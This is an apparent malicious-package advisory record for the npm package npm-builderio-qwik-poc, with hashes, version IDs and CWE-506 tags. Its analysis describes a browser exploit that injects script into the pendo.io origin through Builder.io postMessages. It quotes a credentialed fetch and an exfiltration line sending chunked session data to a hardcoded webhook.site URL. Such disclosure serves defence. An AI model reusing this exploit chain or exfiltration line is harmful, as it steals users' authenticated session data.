-= Per source details. Do not edit below this line.=-
The package's main entry index.js is a working browser exploit, not a library. When loaded in a DOM context, it creates a hidden iframe pointing at www.pendo.io?builder.frameEditing=true, then sprays builder.patchUpdates postMessages whose op:'replace' payload on /bindings/show carries a JavaScript string that the Builder.io SDK's stringToFunction() passes to Function() — achieving script execution in the pendo.io origin. The injected script performs a credentialed fetch('https://novus-api.pendo.io/pendo/app', {credentials:'include'}), base64-encodes the response, chunks it, and exfiltrates each chunk via new Image().src = 'https://webhook.site/236d0505-1750-49fe-907d-604b0934b5c7?chunk=...&d=...' to a hardcoded attacker-controlled webhook. Any developer who bundles this package into a web application weaponizes their site against pendo.io users: visitors will silently leak authenticated pendo.io session data to the attacker. The exfil destination is hardcoded with no opt-in, configuration, or authorization gate, so the harm fires on every load regardless of consumer intent. There is no install-time or import-time Node side effect (the code requires a browser DOM), but the public API surface itself is the attack.
{
"malicious-packages-origins": [
{
"id": "IN-MAL-2026-004566",
"import_time": "2026-05-26T05:52:51.211361606Z",
"modified_time": "2026-05-25T01:59:27Z",
"sha256": "00729d059559e67d66a36c793a193e0907d0e31f7196d0863fbe7921d9b756ef",
"source": "amazon-inspector",
"versions": [
"1.0.2"
]
},
{
"id": "IN-MAL-2026-004572",
"import_time": "2026-05-26T05:52:51.936147635Z",
"modified_time": "2026-05-25T03:34:56Z",
"sha256": "11a743cdce28dd141d636ff13baaee44df53fbaaed17efdc5a7380281b7097e1",
"source": "amazon-inspector",
"versions": [
"1.0.5"
]
},
{
"id": "IN-MAL-2026-004567",
"import_time": "2026-05-26T05:52:51.308809245Z",
"modified_time": "2026-05-25T02:19:41Z",
"sha256": "5958783ffccdde7d47af2465922e5b184a3eff2e9d2083444de7eb759fe007a4",
"source": "amazon-inspector",
"versions": [
"1.0.3"
]
},
{
"id": "IN-MAL-2026-004565",
"import_time": "2026-05-26T05:52:51.116702403Z",
"modified_time": "2026-05-25T01:49:35Z",
"sha256": "e68eb69c555c6bf4528741fc36afb107a698bc4cbf4b8ff380c31f483182bb47",
"source": "amazon-inspector",
"versions": [
"1.0.1"
]
},
{
"id": "IN-MAL-2026-004570",
"import_time": "2026-05-26T05:52:51.710207131Z",
"modified_time": "2026-05-25T03:13:44Z",
"sha256": "f3b92cee36c148a00ed80669d1c687ce67733897be7845e6a7931d4e846dca69",
"source": "amazon-inspector",
"versions": [
"1.0.4"
]
}
]
}[
{
"cweId": "CWE-506",
"description": "The product contains code that appears to be malicious in nature.",
"name": "Embedded Malicious Code"
},
{
"cweId": "CWE-506",
"description": "The product contains code that appears to be malicious in nature.",
"name": "Embedded Malicious Code"
},
{
"cweId": "CWE-506",
"description": "The product contains code that appears to be malicious in nature.",
"name": "Embedded Malicious Code"
},
{
"cweId": "CWE-506",
"description": "The product contains code that appears to be malicious in nature.",
"name": "Embedded Malicious Code"
},
{
"cweId": "CWE-506",
"description": "The product contains code that appears to be malicious in nature.",
"name": "Embedded Malicious Code"
}
]
{
"evidence_files": [
{
"path": "index.js",
"sha256": "c311758a342257091da9b70a5cc243f46ca2b0b424397d32f29e136fe4fdb8bd",
"tlsh": "6451b7bb667c1a242723a0fa6e378f2ddd73673158d294c0d4e487844593ed1d1faa0c"
},
{
"path": "package.json",
"sha256": "15c0388006e747cf4db5da48376441e74d262ac6e076aaf56221a9431d002758",
"tlsh": "6ac02ba00c28a53304cc07a418714605627a0d3fa400200c07033020c0cfff771f530d"
}
],
"package_integrity": [
{
"filename": "npm-builderio-qwik-poc-1.0.2.tgz",
"hashes": {
"sha1": "88bd61c775254c8d7c451d02b2320a2b4f393e1f",
"sha512_sri": "sha512-18irP4sOJgYzahulxZuVPS7OA5IXXKaEbV5KSAUwx/NzP0LL2ulIynrYaeWHjcIHWoOGAaqvx0w03Tprr1lVFQ=="
}
}
]
}
"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/npm-builderio-qwik-poc/MAL-2026-4623.json"